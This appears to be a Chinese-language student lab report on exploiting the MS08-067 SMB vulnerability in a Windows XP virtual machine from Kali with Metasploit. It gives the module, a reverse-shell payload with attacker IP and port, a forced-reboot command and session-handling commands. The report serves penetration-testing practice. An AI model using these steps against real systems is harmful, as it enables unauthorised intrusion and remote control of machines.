1:渗透目标
查找并利用Ms08-067漏洞模块对内网主机进行渗透攻击,渗透成功拿到会话后,执行一些命令。
2:准备阶段
2.1软件
Kali linux Windows XP SP3 Chinese - Simplified (NX) vmware 15 pro
2.2网络配置如下
Windows XP SP3 Chinese - Simplified (NX) 操作系统
kali 2019a
2.3 xp系统设置(两个关闭,三个打开)
(关闭自动更新)(关闭防火墙)否则会一直报连接超时的错误
打开三个服务(computer browser)(server)(workstation)
3:渗透测试阶段
3.1:整体流程图
3.2:执行阶段
1):查找漏洞(可在网上查找公开的平台漏洞)
命令:search ms08_067
2):选择rank等级较高的模块(这里只有一个模块),并选中模块
命令:use exploit/windows/smb/ms08_067_netapi
#上面的意思是:
exploit 可渗透攻击的模块
Windows 操作系统类型
smb
ms08_067_netapi漏洞名称
查看该模块的信息
命令:info
3):查找该漏洞可复现的操作系统类型
命令:show targets
这里我们利用第 34 个操作系统类型进行漏洞复现
4):查看该模块需要配置的参数
命令:show options
required 项为 yes 的为必填项
RHOSTS 要攻击的目标 IP
RPORT 要攻击的目标端口
设置要攻击的 目标ip
命令:set RHOSTS 192.168.0.100
查看配置参数
命令:show options
5):查找可用的攻击载荷
命令:show payloads
选择合适的攻击载荷并设置攻击载荷
命令:set payload generic/shell_reverse_tcp
设置攻击机的ip
命令:set lhost 192.168.0.104
设置攻击机的端口
命令:set lport 4567
设置目标ID(重要命令,一定要写的,不然没法连接)
命令:set target 34
run 之前再看一眼配置
6):开始渗透:
命令:exploit
3.3渗透完成
测试命令
重启xp
命令:shutdown -r -f -t 0
Dir查看当前文件夹
4:总结
从早做到晚
开始忽略了防火墙和自动更新问题
网上查找资料时,好几个解决方案弄混淆了,最后自己都不知道有些东西做没做
不知道系统会崩溃,不可逆转性崩溃
忘记给虚拟机做快照了,最后只好重做系统,设置快照
后台运行会话:background
Sessions -a #查看所有会话
Sessions -i id # 打开ID=id 的会话